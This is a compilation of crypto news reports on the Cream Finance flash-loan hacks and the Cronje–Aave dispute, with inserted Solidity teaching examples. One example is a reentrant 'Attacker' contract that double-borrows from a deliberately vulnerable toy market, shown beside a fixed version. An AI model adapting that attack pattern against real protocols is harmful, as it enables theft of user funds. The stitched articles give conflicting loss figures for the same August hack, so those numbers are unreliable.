Andre Cronje Suggests Aave Has a Major Vulnerability

Key Takeaways

  • Yearn founder Andre Cronje has suggested that Aave may suffer from the same security vulnerability that recently plagued Cream Finance.
  • An Aave community proposal meant to address some potential risks has been approved.
  • While DeFi Twitter has been rife with biting comments, positivity remains.

Some unsavory exchanges between DeFi communities have taken place in the past two days; however, most of it may be noise.

DeFi War? Not So Much

Yearn founder Andre Cronje tweeted today that Aave (TVL of over $19 billion) users are vulnerable to many of the same risks that have recently troubled other protocols. He wrote: 

“Aave core after 24 hour defamation marathon on yearn for cream being exploited, while Aave is vulnerable to the same exploit… Tell me again how much better your security is.”

Cronje appears to be referring to the most recent attack on Cream Finance, which resulted in the loss of roughly $136 million in Cream funds via a flash loan attack two days ago. In August, Cream’s protocol lost $34 million, although $17.6 million of that was returned by the hacker. Cream (TVL of $1.35 billion) is part of Yearn’s ecosystem. Yearn has a TVL of $5.8 billion. 

When asked for comment, Aave founder Stani Kulechov referred Crypto Briefing to a recent Aave Twitter thread that sheds light on the situation. Financial modeling platform Gauntlet Network issued a proposal meant to mitigate possible risk in the Aave protocol. While concerns had been raised earlier this week by Aave community members, simulations run by the Gauntlet Network suggested that such attacks would result in a net loss for the attackers. The proposal passed.

Cronje did not immediately respond to a request for comment. However, today Yearn wrote in a tweet:

“Yearn devs have been in war rooms with Aave and Cream from the start working together. We are assisting with identifying and fixing several issues. If you think we are at war, throw away your newspapers.” 

Perhaps to mitigate conflict and show support, Kulechov wrote early this morning in a tweet:

“Everyone in DeFi is in the same boat. We all want to make finance more fair, transparent and impactful to empower the next wave of users. Building DeFi is hard and communities have their differences. Lets work together, support each other and most importantly win together. WGMI [heart emoji].”

WGMI is crypto slang for “we’re going to make it,” and it is in contrast to NGMI (“not going to make it”). In fact, the hacker of the recent $134 million Cream attack received a message (via a transaction) from a user called “oilysirs.eth,” warning the attacker that they “are NGMI.”

DeFi Platform Loses $130,000,000 in Attack That Cost Over $37,000 in Ethereum Fees

Decentralized Finance (DeFi) platform Cream Finance (CREAM) says that its lending market suffered a hack resulting in the loss of crypto assets worth approximately $130 million.

Cream Finance says in a tweet that the attacker exploited a vulnerability in the first version of the C.R.E.A.M. lending market platform.

“Our Ethereum C.R.E.A.M. v1 lending markets were exploited and liquidity was removed on October 27, 1354 UTC. The attacker removed a total of ~$130m USD worth of tokens from these markets…

No other markets were impacted.”

The attacker made off with 2,760.22 Ether (ETH) and 60 other tokens of varying amounts and value, according to blockchain security firm SlowMist.

Cream Finance says it has now fixed the vulnerability and paused activity on its Ethereum-based lending markets.

“With the help of friends from iearnfinance and others in the community, we were able to identify the vulnerabilities and patch them.

In the meantime, we’ve paused our v1 lending markets on Ethereum and we’re in the process of putting together a post-mortem review.”

According to blockchain security firm BlockSec, the attack involved several transactions and incurred total gas fees of approximately 9.16 ETH. At the time of writing, ETH is trading at around $4,150 per CoinGecko, translating to a transaction fee of about $37,556.

The total value locked on Cream Finance is currently $1.36 billion, according to analytics platform DeFi Llama.

This attack is not the first time Cream Finance has suffered a security breach resulting in the theft of funds. In late August, the platform was hacked for Ethereum and Amp (AMP) tokens worth around $26 million at the time.

Crypto Hackers Steal Over $130M from Cream Finance DeFi Platform

Cream Finance decentralized lending platform has been hacked, with attackers stealing more than $130 million worth of funds through a large flash loan attack.

Blockchain analytics firm PeckShield first identified the large flash loan transaction that the hackers used to exploit the Cream Finance platform.

The affected funds were mostly Cream liquidity provider tokens (Cream LP tokens) as well as other Ethereum-based tokens (ERC-20 tokens).

According to blockchain records, the hackers moved $92 million worth of funds into one address and $23 million into another, with smaller amounts sent to further addresses. The attackers have since moved the funds on to different wallets.

Following the incident, the price of Cream token plunged, from $152 to $111 in minutes, a 27% drop, according to CoinGecko.

In the input data of the exploit transaction, the attacker left a strange message. They wrote, “gÃTµ Baave lucky, iron bank lucky, cream not. ydev : incest bad, don’t do.” This appears to refer to DeFi lending platforms Aave, Iron Bank, and Cream Finance.

This is the third time Cream Finance has faced a severe hack. In February, Cream Finance lost $37.5 million after hackers exploited a flash-loan-related vulnerability.

In August, the protocol also lost $18.8 million after unknown hackers drained funds through a flash loan exploit that leveraged a reentrancy bug in the Amp token contract. After Cream Finance identified the incident, it stated that it had stopped the exploit by pausing supply and borrowing on the Amp market.

During that incident, PeckShield stated that the Amp token’s transfer hook let the attacker re-borrow assets while the tokens from the first borrow were still being transferred, before the protocol had recorded that first borrow. The attacker repeated this across 17 separate transactions.
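The re-borrow-during-transfer pattern described above, as an added illustration that is not Cream’s, Amp’s or PeckShield’s code. It is a constructed, simplified Compound-style market: `HookToken`, `VulnerableMarket`, `HardenedMarket` and `Attacker` are all made-up names, prices are fixed at one token per wei of ETH collateral, and the only thing that matters is the order of the check, the debt write and the external token transfer.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Constructed model of a lending market whose borrow() can be re-entered through a token
// transfer hook. Not production code; names and numbers are illustrative.

interface IHookRecipient {
    function tokensReceived(address from, uint256 amount) external;
}

interface ILendingMarket {
    function deposit() external payable;
    function borrow(uint256 amount) external;
}

// Token whose transfer() notifies contract recipients before it returns
// (the behaviour ERC777-style tokens add on top of plain ERC20).
contract HookToken {
    mapping(address => uint256) public balanceOf;

    function mint(address to, uint256 amount) external { balanceOf[to] += amount; } // demo only, unguarded

    function transfer(address to, uint256 amount) external returns (bool) {
        balanceOf[msg.sender] -= amount;
        balanceOf[to] += amount;
        // Control leaves the token here: the recipient can re-enter whoever called transfer().
        if (to.code.length > 0) IHookRecipient(to).tokensReceived(msg.sender, amount);
        return true;
    }
}

// VULNERABLE: liquidity check, then the external transfer, and only then the debt write.
// While the hook runs, debt[borrower] is still 0, so a nested borrow() passes the same check.
contract VulnerableMarket is ILendingMarket {
    HookToken public immutable token;
    mapping(address => uint256) public collateral; // wei deposited
    mapping(address => uint256) public debt;       // tokens owed
    uint256 public constant LTV_PCT = 50;          // may borrow up to half of collateral

    constructor(HookToken t) { token = t; }

    function deposit() external payable override { collateral[msg.sender] += msg.value; }

    function borrow(uint256 amount) external override {
        require(debt[msg.sender] + amount <= collateral[msg.sender] * LTV_PCT / 100, "undercollateralised"); // check
        require(token.transfer(msg.sender, amount), "transfer failed");                                     // interaction
        debt[msg.sender] += amount;                                                                          // effect, too late
    }
}

// HARDENED: checks-effects-interactions ordering plus a reentrancy guard.
contract HardenedMarket is ILendingMarket {
    HookToken public immutable token;
    mapping(address => uint256) public collateral;
    mapping(address => uint256) public debt;
    uint256 public constant LTV_PCT = 50;
    uint256 private locked = 1;

    modifier nonReentrant() {
        require(locked == 1, "reentrant call");
        locked = 2;
        _;
        locked = 1;
    }

    constructor(HookToken t) { token = t; }

    function deposit() external payable override { collateral[msg.sender] += msg.value; }

    function borrow(uint256 amount) external override nonReentrant {
        require(debt[msg.sender] + amount <= collateral[msg.sender] * LTV_PCT / 100, "undercollateralised"); // check
        debt[msg.sender] += amount;                                                                          // effect
        require(token.transfer(msg.sender, amount), "transfer failed");                                     // interaction
    }
}

// Attacker: deposits collateral, borrows the maximum, then borrows the same amount again
// from inside the token hook while the market has not yet recorded the first loan.
contract Attacker is IHookRecipient {
    ILendingMarket public immutable market;
    address public immutable token;
    uint256 private reentered;

    constructor(ILendingMarket m, address t) { market = m; token = t; }

    function attack() external payable {
        market.deposit{value: msg.value}();
        market.borrow(msg.value / 2); // exactly the 50% limit
    }

    function tokensReceived(address, uint256 amount) external override {
        if (msg.sender == token && reentered == 0) {
            reentered = 1;
            market.borrow(amount); // vs VulnerableMarket: succeeds, total debt ends at 100% of collateral
        }
    }
}
```

To run it: deploy `HookToken`, deploy a market with it, `mint` 1 ether of tokens to the market, deploy `Attacker(market, token)` and call `attack{value: 1 ether}()`. Against `VulnerableMarket`, `debt(attacker)` ends at 1e18 against 1e18 of collateral, double the allowed ratio. Against `HardenedMarket`, the nested call hits the guard and the whole transaction reverts; even without the guard, the nested check would see the already-recorded debt and fail with “undercollateralised”, which is why recording the effect before the external call is the primary fix and the guard is defence in depth.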

Calls for More Investor Protections

Flash loans allow users to borrow funds without collateral because the loan must be repaid within the same transaction: if it is not, the whole transaction reverts and the lender is never out of pocket. Attackers have repeatedly used this to obtain the large amounts of capital needed to exploit flaws in other protocols, draining millions of dollars.
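The mechanism described above, as an added example that is not Aave’s or Cream’s code. `FlashPool`, `IFlashBorrower` and `FlashBorrower` are made-up names; the point is the three steps in `flashLoan`: send the funds, hand control to the borrower, then refuse to finish unless principal plus fee is back.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Constructed illustration of the flash-loan invariant. Not a real protocol's code.

interface IERC20 {
    function balanceOf(address account) external view returns (uint256);
    function transfer(address to, uint256 amount) external returns (bool);
}

interface IFlashBorrower {
    // Called by the pool after `amount` tokens have already been sent to the borrower.
    function onFlashLoan(address token, uint256 amount, uint256 fee, bytes calldata data) external;
}

contract FlashPool {
    IERC20 public immutable token;
    uint256 public constant FEE_BPS = 9; // 0.09% fee, charged on top of the principal

    constructor(IERC20 t) { token = t; }

    function flashLoan(uint256 amount, bytes calldata data) external {
        uint256 before = token.balanceOf(address(this));
        require(amount <= before, "insufficient liquidity");
        uint256 fee = amount * FEE_BPS / 10_000;

        // 1. Send the funds with no collateral and no credit check.
        require(token.transfer(msg.sender, amount), "transfer failed");
        // 2. Let the borrower run arbitrary logic with the capital (arbitrage, liquidations,
        //    or, in an attack, moving a price or oracle that some other protocol trusts).
        IFlashBorrower(msg.sender).onFlashLoan(address(token), amount, fee, data);
        // 3. Refuse to complete unless principal + fee is back. A failed require undoes step 1
        //    and every state change the borrower made in step 2: the loan never happened.
        require(token.balanceOf(address(this)) >= before + fee, "flash loan not repaid");
    }
}

// A well-behaved borrower. It must push the repayment itself inside the callback and must
// already hold the fee; otherwise the pool's final check reverts the whole transaction.
contract FlashBorrower is IFlashBorrower {
    FlashPool public immutable pool;

    constructor(FlashPool p) { pool = p; }

    function execute(uint256 amount) external { pool.flashLoan(amount, ""); }

    function onFlashLoan(address token, uint256 amount, uint256 fee, bytes calldata) external override {
        require(msg.sender == address(pool), "untrusted caller");
        // ... use `amount` here; it is fully available for the rest of this transaction ...
        require(IERC20(token).transfer(address(pool), amount + fee), "repay failed");
    }
}
```

Because the balance check runs after the callback, the pool is indifferent to what the borrower does in between. That is exactly what makes flash loans useful for attackers: the capital is free of counterparty risk for the lender, so the only defence is in the protocols the borrowed capital is pointed at, for example by not trusting spot prices or balances that a single transaction can move.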

As reported by Blockchain.News in August, Poly Network DeFi protocol was attacked and hackers stole $600 million worth of funds from the protocol. This is considered the largest hack in DeFi and cryptocurrency history.

Decentralized Finance (DeFi), which is one of the use cases of blockchain technology, has been on the cusp of major growth. Regulators are aware of this growth and, of late, have been moving to act accordingly.

Frequent hacks like the abovementioned incidents have prompted regulators to call for better consumer protection in the DeFi sector.

In August, US SEC chairman Gary Gensler made it clear that regulation of DeFi platforms and stablecoins is on the SEC’s agenda. During that time, Gensler compared the use of DeFi to the Wild West, emphasizing it needs better investor protection.

$136M Lost as Cream Finance Suffers Another Flash Loan Attack

Decentralized lending protocol Cream Finance has been hit by a major flash loan attack. The assailant borrowed $2 billion from Aave and made off with over $130 million worth of Ethereum-based tokens.

Cream Finance Hit By Another Flash Loan Attack

Cream Finance has been exploited. 

An attacker successfully used a flash loan earlier today to borrow 524,102.159 ETH from Aave, worth about $2 billion at today’s prices. They then successfully drained Cream Finance of several DeFi tokens, making off with around $136 million at peak prices according to Zerion. The transaction for the attack cost $36,574.34 and can be viewed on Etherscan.

The smart contract auditing firm PeckShield broke the news of the attack on Twitter this afternoon, while Cream Finance announced that it was “investigating an exploit on C.R.E.A.M. v1 on Ethereum.” The team added that it would share further updates as soon as they’re available. 

The Etherscan transaction history shows that the attacker moved at least $92 million to one Ethereum wallet and $23 million to another. The stolen funds consisted mainly of Cream LP tokens, which can be earned for providing liquidity to the protocol, as well as XSUSHI, WNXM, YFI, and several other ERC-20 tokens and stablecoins.

In the input data for the transaction, the attacker left the following message:

“gÃTµ Baave lucky, iron bank lucky, cream not. ydev : incest bad, dont do”

The message likely refers to Cream Finance’s Iron Bank, which Alpha Finance uses in partnership with Cream. Alpha Finance posted an update confirming that Iron Bank and its Alpha Homora V2 product were “safe” following the attack. Yearn Finance also posted an update confirming that its products have not been affected and its team was “assisting Cream with investigation of the exploit.”

Interestingly, the wallet containing the majority of the attacker’s stolen funds received a transaction from a user with the Ethereum Name Service domain oilysirs.eth following the attack. The transaction contained a message that warned the attacker that they “are NGMI” because they “will never be able to cash that amount out.” “NGMI” is a popular meme in the crypto community. It’s typically used as an insult, meaning “Not Going to Make It.”

Following the attack, crypto investor and researcher Adam Cochran noted that Cream’s staked Ethereum 2.0 service is custodial, suggesting that users may be reimbursed for the stolen Cream LP tokens.

The attacker also used the DeFi exchange aggregator ParaSwap to convert tokens such as AAVE and PERP into ETH and USDC. They also used Ren’s bridge to move over $1 million into BTC.

The total value locked on the protocol has shrunk by 72%, while the price of Cream’s native governance token CREAM has plummeted by around 27%, trading at $114 at the time of writing.

Notably, this isn’t the first time Cream Finance has been hit by a severe attack. The protocol lost $34 million in a similar exploit as recently as August, though the attacker later returned a portion of the funds.

Editor’s note: This is a developing story and will be updated as details emerge. 

Disclosure: At the time of writing, the author of this feature owned ETH and xSUSHI. 

DeFi security project ‘Lossless’ helps recover $16.7M from Cream Finance hack

Lossless, a decentralized finance (DeFi) security outfit, has assisted in the recovery of 5,152.6 Ether (ETH) siphoned during the Cream Finance exploit that occurred in August.

Tweeting on Monday, Lossless identified white hat security expert Pascal Caversaccio as being pivotal to the successful recovery of the siphoned funds.

As previously reported by Cointelegraph, DeFi lending protocol Cream Finance suffered a flash loan attack to the tune of $19 million in ETH and Amp tokens back in August. Following the exploit, Cream stated that it would repay the siphoned funds via fees collected on the protocol to compensate affected users.

Detailing the asset retrieval process, Lossless stated that it used its extensive connections within the world of hackers to enable the return of the funds taken during the flash loan attack.

Commenting on the recovery process, Dominykas A. van Otterlo, chief business development officer at Lossless told Cointelegraph:

“We managed to track down the hacker manually and retrieve the stolen funds for CREAM Finance. You could say it was sort of cyber detective work, not an easy task. Thanks to Pascal Caversaccio, one of our white hat hackers, who helped us to track down the hacker.”

Lossless also stated that the project is looking to launch a hack mitigation tool that will allow protocol developers to adopt a “hands-on” approach to preventing such malicious exploits of their platform.

Part of this mitigation will reportedly include a 24-hour freeze on suspicious transactions to allow time for robust investigations.

According to van Otterlo, Lossless is leveraging the project’s knowledge-base acquired while manually tracking down hackers. Lossless plans to offer security support for DeFi projects across the Ethereum, Polygon, and Binance Smart Chain networks as well as plans for deployment on layer-two protocols.

According to a Cream Finance statement from Oct. 1, Lossless and Caversaccio earned the 50% bug bounty from the successful fund recovery. “This is our first recovery of such scale,” Lossless tweeted in response to Cream Finance’s announcement.

DeFi platforms continue to fall victim to hackers and opportunistic profiteers who take advantage of vulnerabilities in smart contract code to siphon funds from these projects.

Indeed, in August, Poly Network suffered a massive $610 million hack across multiple networks. The entity responsible did eventually return the stolen funds but the incident offered a pointer to the security loopholes prevalent in the DeFi space.

DeFi projects continue to offer bug bounties to white hat hackers to discover vulnerabilities that escaped the code auditing process. In September, white hat programmer Alexander Schlindwein reportedly received $1.05 million in bug bounty payments from Belt Finance.